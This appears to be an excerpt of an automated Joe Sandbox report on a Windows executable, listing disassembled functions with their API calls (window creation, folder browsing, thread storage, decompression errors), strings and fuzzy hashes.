Instruction ID: 2c080862c33f0b7fb519294060e944d109da0d65108c87cfa11e07f441f421b0
Opcode Fuzzy Hash: 3010fbf55b21657f3d2da30d78e3fc06337a299998e6cc7e6108e39cc3db3a27
Instruction Fuzzy Hash: 40C02B34712690C2E3492323AC033991090F34C3C0FD02018F60102770CE3D80A70B00

Function 000000014000C6B0 Relevance: 1.5, APIs: 1, Instructions: 8COMMON

Download Yara Rule

APIs

RemoveVectoredExceptionHandler.KERNEL32 ref: 000000014000C6C0

Memory Dump Source

Source File: 00000007.00000002.2767768331.0000000140001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2767669789.0000000140000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2767891396.0000000140018000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2768276964.000000014001F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2768507823.0000000140022000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_4ZAAIhb.jbxd

Similarity

API ID: ExceptionHandlerRemoveVectored
String ID:
API String ID: 1340492425-0
Opcode ID: d65e708e3fd015015f13c97e564679718939e1a537f1569a86aba6eef632a387
Instruction ID: 43e8ab96d0ef540813763e0684213002212cef3b8ee59004a75f8fb70944dace
Opcode Fuzzy Hash: d65e708e3fd015015f13c97e564679718939e1a537f1569a86aba6eef632a387
Instruction Fuzzy Hash: 30C08C78B03B0085FA4AEB03B8883A422606B8C7C1F800008E60E037328E3C04A54780

Non-executed Functions

Function 000000014000B758 Relevance: 72.0, APIs: 35, Strings: 6, Instructions: 272windowmemoryregistryCOMMON

Download Yara Rule

APIs

Part of subcall function 000000014000B5D8: wcslen.MSVCRT ref: 000000014000B5EA
Part of subcall function 000000014000B5D8: HeapAlloc.KERNEL32 ref: 000000014000B600

GetStockObject.GDI32 ref: 000000014000B7B6
LoadIconW.USER32 ref: 000000014000B7F2
LoadCursorW.USER32 ref: 000000014000B803
RegisterClassExW.USER32 ref: 000000014000B82D
IsWindowEnabled.USER32 ref: 000000014000B859
EnableWindow.USER32 ref: 000000014000B86C
GetSystemMetrics.USER32 ref: 000000014000B88B
GetSystemMetrics.USER32 ref: 000000014000B89B
CreateWindowExW.USER32 ref: 000000014000B8F0
SetWindowLongPtrW.USER32 ref: 000000014000B90E
CreateWindowExW.USER32 ref: 000000014000B95E
SendMessageW.USER32 ref: 000000014000B97C
CreateWindowExW.USER32 ref: 000000014000B9D9
SendMessageW.USER32 ref: 000000014000B9FA
SetFocus.USER32 ref: 000000014000BA07
SendMessageW.USER32 ref: 000000014000BA22
wcslen.MSVCRT ref: 000000014000BA2B
wcslen.MSVCRT ref: 000000014000BA36
SendMessageW.USER32 ref: 000000014000BA4D
CreateWindowExW.USER32 ref: 000000014000BAA9
SendMessageW.USER32 ref: 000000014000BAC8
CreateAcceleratorTableW.USER32 ref: 000000014000BAED
SetForegroundWindow.USER32 ref: 000000014000BAF9
BringWindowToTop.USER32 ref: 000000014000BB02
GetMessageW.USER32 ref: 000000014000BB16
TranslateAcceleratorW.USER32 ref: 000000014000BB2A
TranslateMessage.USER32 ref: 000000014000BB38
DispatchMessageW.USER32 ref: 000000014000BB42
DestroyAcceleratorTable.USER32 ref: 000000014000BB59
wcslen.MSVCRT ref: 000000014000BB68
wcscpy.MSVCRT ref: 000000014000BB7E
HeapFree.KERNEL32 ref: 000000014000BB90
HeapFree.KERNEL32 ref: 000000014000BBB5
HeapFree.KERNEL32 ref: 000000014000BBCC
HeapFree.KERNEL32 ref: 000000014000BBE3

Strings

n, xrefs: 000000014000BAA1
STATIC, xrefs: 000000014000B944
BUTTON, xrefs: 000000014000BA8A
C, xrefs: 000000014000BA99
P, xrefs: 000000014000BA7B
EDIT, xrefs: 000000014000B9BF

Memory Dump Source

Source File: 00000007.00000002.2767768331.0000000140001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2767669789.0000000140000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2767891396.0000000140018000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2768276964.000000014001F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2768507823.0000000140022000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_4ZAAIhb.jbxd

Similarity

API ID: Window$Message$CreateHeapSend$Freewcslen$Accelerator$LoadMetricsSystemTableTranslate$AllocBringClassCursorDestroyDispatchEnableEnabledFocusForegroundIconLongObjectRegisterStockwcscpy
String ID: BUTTON$C$EDIT$P$STATIC$n
API String ID: 9748049-1690119102
Opcode ID: c01de26334065d18653497f5b45086f7b5809085fdd55da687512dab041c8858
Instruction ID: f11a45e4f50ece19de517c67b98e9e797584e7b20c87343cc1d5b6865565d8d0
Opcode Fuzzy Hash: c01de26334065d18653497f5b45086f7b5809085fdd55da687512dab041c8858
Instruction Fuzzy Hash: 4DD134B5605B4086EB12DF62F8447AA77A5FB8CBC8F444129EB4A47B79DF7DC4098B00

Function 0000000140013021 Relevance: 7.9, APIs: 1, Strings: 4, Instructions: 381COMMON

Download Yara Rule

Strings

unknown compression method, xrefs: 0000000140012F79
unknown header flags set, xrefs: 000000014001305E
header crc mismatch, xrefs: 000000014001348B
, xrefs: 00000001400130EB

Memory Dump Source

Source File: 00000007.00000002.2767768331.0000000140001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2767669789.0000000140000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2767891396.0000000140018000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2768276964.000000014001F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2768507823.0000000140022000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_4ZAAIhb.jbxd

Similarity

API ID:
String ID: $header crc mismatch$unknown compression method$unknown header flags set
API String ID: 0-4074041902
Opcode ID: 63d14d99d44cc3d14528aba0519c32bd687ffcf0a398d873a188d18be175c855
Instruction ID: dac418b812a3de41c7c7b5072b67fa498c356b49e4a588b682982c80ed946ec6
Opcode Fuzzy Hash: 63d14d99d44cc3d14528aba0519c32bd687ffcf0a398d873a188d18be175c855
Instruction Fuzzy Hash: 4DF19C726007508BEB268F1AC48CBAE3BE6F7487C8F064519EF8A4B7A4DB76C555C740

Function 000000014000BC94 Relevance: 24.6, APIs: 10, Strings: 4, Instructions: 115libraryloaderCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32 ref: 000000014000BCDB
memset.MSVCRT ref: 000000014000BCEC
LoadLibraryW.KERNEL32 ref: 000000014000BCFB
GetProcAddress.KERNEL32 ref: 000000014000BD1C
GetProcAddress.KERNEL32 ref: 000000014000BD2F
wcsncpy.MSVCRT ref: 000000014000BD53
wcslen.MSVCRT ref: 000000014000BD66
CoTaskMemFree.OLE32 ref: 000000014000BDF2
wcslen.MSVCRT ref: 000000014000BDFB
FreeLibrary.KERNEL32 ref: 000000014000BE18

Strings

P, xrefs: 000000014000BD9C
SHELL32.DLL, xrefs: 000000014000BCF1
SHGetPathFromIDListW, xrefs: 000000014000BD22
SHBrowseForFolderW, xrefs: 000000014000BD12

Memory Dump Source

Source File: 00000007.00000002.2767768331.0000000140001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2767669789.0000000140000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2767891396.0000000140018000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2768276964.000000014001F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2768507823.0000000140022000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_4ZAAIhb.jbxd

Similarity

API ID: AddressFreeLibraryProcwcslen$InitializeLoadTaskmemsetwcsncpy
String ID: P$SHBrowseForFolderW$SHELL32.DLL$SHGetPathFromIDListW
API String ID: 217932011-4219398408
Opcode ID: 39b50941fe3cb3f8533201b67178e799832ef7c6affe56ff9212f5b17596b26d
Instruction ID: 4189c401249be1c18680961fdd5f00b64fd9ff4c66db3fab09ee0cba437a9a89
Opcode Fuzzy Hash: 39b50941fe3cb3f8533201b67178e799832ef7c6affe56ff9212f5b17596b26d
Instruction Fuzzy Hash: 6C418F72211B4086EB16EF12F8447EA73A4F78CBC8F544125EB49477A5DF39C55AC700

Function 000000014000DB18 Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 107libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 00000001400126D0: TlsGetValue.KERNEL32 ref: 00000001400126E2
Part of subcall function 00000001400126D0: HeapReAlloc.KERNEL32 ref: 0000000140012762

LoadLibraryW.KERNEL32 ref: 000000014000DB51
GetProcAddress.KERNEL32 ref: 000000014000DB69
wcscpy.MSVCRT ref: 000000014000DB9A
wcscat.MSVCRT ref: 000000014000DBA9
wcslen.MSVCRT ref: 000000014000DBB1
CoTaskMemFree.OLE32 ref: 000000014000DBBE
FreeLibrary.KERNEL32 ref: 000000014000DBC7
wcscat.MSVCRT ref: 000000014000DBEC
wcslen.MSVCRT ref: 000000014000DBF4

Strings

Downloads\, xrefs: 000000014000DBE2
SHGetKnownFolderPath, xrefs: 000000014000DB5F
Shell32.DLL, xrefs: 000000014000DB4A

Memory Dump Source

Source File: 00000007.00000002.2767768331.0000000140001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2767669789.0000000140000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2767891396.0000000140018000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2768276964.000000014001F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2768507823.0000000140022000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_4ZAAIhb.jbxd

Similarity

API ID: FreeLibrarywcscatwcslen$AddressAllocHeapLoadProcTaskValuewcscpy
String ID: Downloads\$SHGetKnownFolderPath$Shell32.DLL
API String ID: 1740785346-287042676
Opcode ID: 1a17e227a26f4eede426f334c2ee746aae7c8b1e13925a610746eba211cb8f63
Instruction ID: 39544a34e48b1591535f5ec23c8084432afafb0fbbbedabb5ee694640fe7ccea
Opcode Fuzzy Hash: 1a17e227a26f4eede426f334c2ee746aae7c8b1e13925a610746eba211cb8f63
Instruction Fuzzy Hash: A94184B1214A46C2FA26EB57B4A4BF97291AB8C7D0F540127BB0A0B7F5DEB9C841C610

Function 0000000140016CC4 Relevance: 19.6, APIs: 13, Instructions: 81memoryregistrythreadCOMMON

Download Yara Rule

APIs

TlsAlloc.KERNEL32 ref: 0000000140016CF2
InitializeCriticalSection.KERNEL32 ref: 0000000140016D01
TlsGetValue.KERNEL32 ref: 0000000140016D17
HeapAlloc.KERNEL32 ref: 0000000140016D37
EnterCriticalSection.KERNEL32 ref: 0000000140016D4C
LeaveCriticalSection.KERNEL32 ref: 0000000140016D6F
GetCurrentProcess.KERNEL32 ref: 0000000140016D75
GetCurrentThread.KERNEL32 ref: 0000000140016D7E
GetCurrentProcess.KERNEL32 ref: 0000000140016D87
DuplicateHandle.KERNEL32 ref: 0000000140016DAC
RegisterWaitForSingleObject.KERNEL32 ref: 0000000140016DD1
TlsSetValue.KERNEL32 ref: 0000000140016DE0
HeapAlloc.KERNEL32 ref: 0000000140016DF3

Memory Dump Source

Source File: 00000007.00000002.2767768331.0000000140001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2767669789.0000000140000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2767891396.0000000140018000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2768276964.000000014001F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2768507823.0000000140022000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_4ZAAIhb.jbxd

Similarity

API ID: AllocCriticalCurrentSection$HeapProcessValue$DuplicateEnterHandleInitializeLeaveObjectRegisterSingleThreadWait
String ID:
API String ID: 298514914-0
Opcode ID: 1b9229a9ff34361a6518eb59eadc8af634e0fb6f78aa303e2f888cecdd8f7a24
Instruction ID: 65bd0fc00ed65caac6c8ae18375092c396c339aa9c4fc9a556ba9f8eb5a1fbfe
Opcode Fuzzy Hash: 1b9229a9ff34361a6518eb59eadc8af634e0fb6f78aa303e2f888cecdd8f7a24
Instruction Fuzzy Hash: F141E132205B408AEB129F62EC443E977A0F78CBD5F484129EB490B774DF39C959D740

Function 0000000140008260 Relevance: 13.7, APIs: 9, Instructions: 249COMMON

Download Yara Rule

APIs

wcsncpy.MSVCRT ref: 0000000140008373

Part of subcall function 0000000140012630: TlsGetValue.KERNEL32 ref: 000000014001263F

_wcsdup.MSVCRT ref: 00000001400083AD
_wcsdup.MSVCRT ref: 00000001400083D0
_wcsdup.MSVCRT ref: 00000001400083EE
wcsncpy.MSVCRT ref: 00000001400084F6
free.MSVCRT ref: 0000000140008570
free.MSVCRT ref: 0000000140008582
free.MSVCRT ref: 0000000140008596
wcsncpy.MSVCRT ref: 00000001400085CE

Memory Dump Source

Source File: 00000007.00000002.2767768331.0000000140001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2767669789.0000000140000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2767891396.0000000140018000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2768276964.000000014001F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2768507823.0000000140022000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_4ZAAIhb.jbxd

Similarity

API ID: _wcsdupfreewcsncpy$Value
String ID:
API String ID: 1554701960-0
Opcode ID: 1d879e7a0acd0c0829ed1bc558ef67cfa511ed4a967529a3de4af1c33dacc62b
Instruction ID: 9aa5ebfb9d0338231e5de8689cc7ecd01d3be8732c0a46cca62a2a5aa1271af7
Opcode Fuzzy Hash: 1d879e7a0acd0c0829ed1bc558ef67cfa511ed4a967529a3de4af1c33dacc62b
Instruction Fuzzy Hash: FB91BFB2604A8185EA76DF13B9507EA73A0FB48BD5F484225BFCA476E5EB38C542C701

Function 000000014000B64C Relevance: 12.1, APIs: 8, Instructions: 56COMMON

Download Yara Rule

APIs

DefWindowProcW.USER32 ref: 000000014000B674
EnableWindow.USER32 ref: 000000014000B6F6
DestroyWindow.USER32 ref: 000000014000B706
UnregisterClassW.USER32 ref: 000000014000B71C

Memory Dump Source

Source File: 00000007.00000002.2767768331.0000000140001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2767669789.0000000140000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2767891396.0000000140018000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2768276964.000000014001F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2768507823.0000000140022000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_4ZAAIhb.jbxd

Similarity

API ID: Window$ClassDestroyEnableProcUnregister
String ID:
API String ID: 1570244450-0
Opcode ID: 91bde67e80f91e2742b9164cbcf556c590c39b782bd753c692008bc4014d2561
Instruction ID: 9942cbda7600913111d3f6e009e2264a98590d225334710fbbc2bdadcd09b10d
Opcode Fuzzy Hash: 91bde67e80f91e2742b9164cbcf556c590c39b782bd753c692008bc4014d2561
Instruction Fuzzy Hash: F121F9B4204A5182FB56DB27F8483A923A1E78CBC1F549126FB4A4B7B5DF3DC8459700

Function 000000014000BEA0 Relevance: 12.0, APIs: 8, Instructions: 44threadwindowCOMMON

Download Yara Rule

APIs

GetWindowThreadProcessId.USER32 ref: 000000014000BEAF
GetCurrentThreadId.KERNEL32 ref: 000000014000BEB7
IsWindowVisible.USER32 ref: 000000014000BEC4

Part of subcall function 0000000140011CB0: HeapAlloc.KERNEL32 ref: 0000000140011CC8

GetCurrentThreadId.KERNEL32 ref: 000000014000BEE6
GetWindowLongPtrW.USER32 ref: 000000014000BEFC
GetForegroundWindow.USER32 ref: 000000014000BF0A
IsWindowEnabled.USER32 ref: 000000014000BF18
EnableWindow.USER32 ref: 000000014000BF2B

Memory Dump Source

Source File: 00000007.00000002.2767768331.0000000140001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2767669789.0000000140000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2767891396.0000000140018000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2768276964.000000014001F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2768507823.0000000140022000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_4ZAAIhb.jbxd

Similarity

API ID: Window$Thread$Current$AllocEnableEnabledForegroundHeapLongProcessVisible
String ID:
API String ID: 3383493704-0
Opcode ID: 58dc5949c501ee915ee066136f95cf395d457a23a7ff8083782f65faeab631ed
Instruction ID: 80f857dfb6a9a2f530fca3cb10c8fb692f8ca5f83b5b0ec86a1534c3d91aadad
Opcode Fuzzy Hash: 58dc5949c501ee915ee066136f95cf395d457a23a7ff8083782f65faeab631ed
Instruction Fuzzy Hash: 9D11397020064182EB46AB27A9483B962A1EB8CBC4F448024FA0A4B6B5DF7DC5458301

Function 0000000140011AB8 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 53librarysleeploaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32 ref: 0000000140011AD9
GetProcAddress.KERNEL32 ref: 0000000140011AF5
FreeLibrary.KERNEL32 ref: 0000000140011B1A
Sleep.KERNEL32 ref: 0000000140011B3A

Strings

Kernel32.dll, xrefs: 0000000140011ACD
InitOnceExecuteOnce, xrefs: 0000000140011AEB

Memory Dump Source

Source File: 00000007.00000002.2767768331.0000000140001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2767669789.0000000140000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2767891396.0000000140018000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2768276964.000000014001F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2768507823.0000000140022000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_4ZAAIhb.jbxd

Similarity

API ID: Library$AddressFreeLoadProcSleep
String ID: InitOnceExecuteOnce$Kernel32.dll
API String ID: 938261879-1339284965
Opcode ID: 9cc1215efa9171b7dae7fadfb2c47d350fa49a6ad5bcb444afd81da3a54d843a
Instruction ID: 258e5301f75bcfa7e340e12184f2e3f20ed82b399a9dd39da3854f47a4428b06
Opcode Fuzzy Hash: 9cc1215efa9171b7dae7fadfb2c47d350fa49a6ad5bcb444afd81da3a54d843a
Instruction Fuzzy Hash: AB118F3120974585EB5ADF57E8843E973A0FB8CBD0F488029AB0A0B666EF3AC595C340

Function 000000014000BF44 Relevance: 9.1, APIs: 6, Instructions: 63threadCOMMON

Download Yara Rule

APIs

EnumWindows.USER32 ref: 000000014000BF61
GetCurrentThreadId.KERNEL32 ref: 000000014000BF7A
SetWindowPos.USER32 ref: 000000014000BFAB
GetCurrentThreadId.KERNEL32 ref: 000000014000BFCA
EnableWindow.USER32 ref: 000000014000BFE4
SetWindowPos.USER32 ref: 000000014000C010

Memory Dump Source

Source File: 00000007.00000002.2767768331.0000000140001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2767669789.0000000140000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2767891396.0000000140018000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2768276964.000000014001F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2768507823.0000000140022000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_4ZAAIhb.jbxd

Similarity

API ID: Window$CurrentThread$EnableEnumWindows
String ID:
API String ID: 2527101397-0
Opcode ID: 819563b769547833593462bfdd9e557783e2fe60f6ea2978649c293be4a90c74
Instruction ID: 08829170a8ee5f1b49cfdf050f6537c1ef42b3a6330418e8cb94bb4851fba9f1
Opcode Fuzzy Hash: 819563b769547833593462bfdd9e557783e2fe60f6ea2978649c293be4a90c74
Instruction Fuzzy Hash: 6D3171B261064182FB62CF22F5487A977A1F75CBE9F484215FB6947AF9CB79C844CB00

Function 00000001400110DC Relevance: 9.1, APIs: 6, Instructions: 62memoryCOMMON

Download Yara Rule

APIs

TlsAlloc.KERNEL32 ref: 0000000140011112
HeapAlloc.KERNEL32 ref: 000000014001112D
TlsSetValue.KERNEL32 ref: 000000014001113C
TlsGetValue.KERNEL32 ref: 000000014001115F
HeapReAlloc.KERNEL32 ref: 000000014001117B
TlsSetValue.KERNEL32 ref: 000000014001118D

Memory Dump Source

Source File: 00000007.00000002.2767768331.0000000140001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2767669789.0000000140000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2767891396.0000000140018000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2768276964.000000014001F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2768507823.0000000140022000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_4ZAAIhb.jbxd

Similarity

API ID: AllocValue$Heap
String ID:
API String ID: 2472784365-0
Opcode ID: 817cb6a234a385814b06518aa112c5efe756708d8e68811ae307d73ca14c2163
Instruction ID: 773301f083ee798336704ec3d5312664b9b868eef9dc2a5d6ba13fea1fa7b4fd
Opcode Fuzzy Hash: 817cb6a234a385814b06518aa112c5efe756708d8e68811ae307d73ca14c2163
Instruction Fuzzy Hash: 3821F434200B8096EB4A9B92F8843E963A5F7DCBD0F548429FB4D47B79DE3DC8858740

Function 0000000140007284 Relevance: 7.6, APIs: 5, Instructions: 56synchronizationthreadCOMMON

Download Yara Rule

APIs

CreateThread.KERNEL32 ref: 00000001400072B3
EnterCriticalSection.KERNEL32 ref: 00000001400072CC
WaitForSingleObject.KERNEL32 ref: 00000001400072E4
CloseHandle.KERNEL32 ref: 00000001400072F1
LeaveCriticalSection.KERNEL32 ref: 0000000140007344

Memory Dump Source

Source File: 00000007.00000002.2767768331.0000000140001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2767669789.0000000140000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2767891396.0000000140018000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2768276964.000000014001F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2768507823.0000000140022000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_4ZAAIhb.jbxd

Similarity

API ID: CriticalSection$CloseCreateEnterHandleLeaveObjectSingleThreadWait
String ID:
API String ID: 458812214-0
Opcode ID: 6a38117e792cc01899f22305820c9a0c290a6e73bcc29c544877765eca75b33b
Instruction ID: 6ed0f769cbd5916c92599595d34faf5ec2fc13e913d525d246d608b89e2aac48
Opcode Fuzzy Hash: 6a38117e792cc01899f22305820c9a0c290a6e73bcc29c544877765eca75b33b
Instruction Fuzzy Hash: FD210076204B0081EB06DB22E8943E973A4FB8CBC4F988026EB4D47779DF39C946C340

Function 0000000140011968 Relevance: 7.6, APIs: 5, Instructions: 51memoryCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 0000000140011985
LeaveCriticalSection.KERNEL32 ref: 00000001400119F4

Part of subcall function 0000000140011968: HeapFree.KERNEL32 ref: 00000001400119E7

DeleteCriticalSection.KERNEL32 ref: 0000000140011A0B
HeapFree.KERNEL32 ref: 0000000140011A1D

Memory Dump Source

Source File: 00000007.00000002.2767768331.0000000140001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2767669789.0000000140000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2767891396.0000000140018000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2768276964.000000014001F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2768507823.0000000140022000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_4ZAAIhb.jbxd

Similarity

API ID: CriticalSection$FreeHeap$DeleteEnterLeave
String ID:
API String ID: 3171405041-0
Opcode ID: 5bac674c3f8342d6cd0aac8621eb4a2ebf53081d1a9cae62f807694b4d99e6ae
Instruction ID: 030e86aa03d9d600b90796447865b7023312810cb66964dcc71f9bcfbca43c2c
Opcode Fuzzy Hash: 5bac674c3f8342d6cd0aac8621eb4a2ebf53081d1a9cae62f807694b4d99e6ae
Instruction Fuzzy Hash: 4721E735201B4485EB4ADB57E5903E823A4F78CBC4F444115AB5E0B7B6CF3AC4A5C340

Function 00000001400117FC Relevance: 6.3, APIs: 5, Instructions: 99memoryCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 0000000140011855
HeapAlloc.KERNEL32 ref: 0000000140011890
LeaveCriticalSection.KERNEL32 ref: 00000001400118FB
HeapAlloc.KERNEL32 ref: 0000000140011910
InitializeCriticalSection.KERNEL32 ref: 0000000140011952

Memory Dump Source

Source File: 00000007.00000002.2767768331.0000000140001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2767669789.0000000140000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2767891396.0000000140018000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2768276964.000000014001F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2768507823.0000000140022000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_4ZAAIhb.jbxd

Similarity

API ID: CriticalSection$AllocHeap$EnterInitializeLeave
String ID:
API String ID: 2544007295-0
Opcode ID: 964df89806ab1b98e43ea449fff5c56c6dda4054a8aa2c3e42b83df1ec0c2f38
Instruction ID: 3c708bd0e8d6be70d523372ffb5b6a2e3cd9d0d7dbc1ea7b56162c86fa93b61b
Opcode Fuzzy Hash: 964df89806ab1b98e43ea449fff5c56c6dda4054a8aa2c3e42b83df1ec0c2f38
Instruction Fuzzy Hash: 5E413932605B8086EB5ADF56E4403E877A4F79CBD0F54812AEB4D4BBA5DF39C8A5C700

Function 000000014000E824 Relevance: 6.3, APIs: 5, Instructions: 92COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 000000014000E9C7
memset.MSVCRT ref: 000000014000E9D5
memset.MSVCRT ref: 000000014000E9E2
memset.MSVCRT ref: 000000014000E9F1
memset.MSVCRT ref: 000000014000E9FF

Part of subcall function 000000014000FEE4: memmove.MSVCRT ref: 000000014000FF5C

Memory Dump Source

Source File: 00000007.00000002.2767768331.0000000140001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2767669789.0000000140000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2767891396.0000000140018000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2768276964.000000014001F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2768507823.0000000140022000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_4ZAAIhb.jbxd

Similarity

API ID: memset$memmove
String ID:
API String ID: 3527438329-0
Opcode ID: 1e0a837dc669331cc5957db2528f79886a441c50ac0b901b14f5572dc67d68da
Instruction ID: dba297aa8fb042b18ff0822facc25e4acf5e394d44c3b4579297ae20e1131b5c
Opcode Fuzzy Hash: 1e0a837dc669331cc5957db2528f79886a441c50ac0b901b14f5572dc67d68da
Instruction Fuzzy Hash: E231007271064081FB16DA2BE4507E96612E38DBD0F848126EB1A83BAACA7EC502C740

Function 00000001400130CB Relevance: 6.3, APIs: 1, Strings: 3, Instructions: 257COMMON

Download Yara Rule

Strings

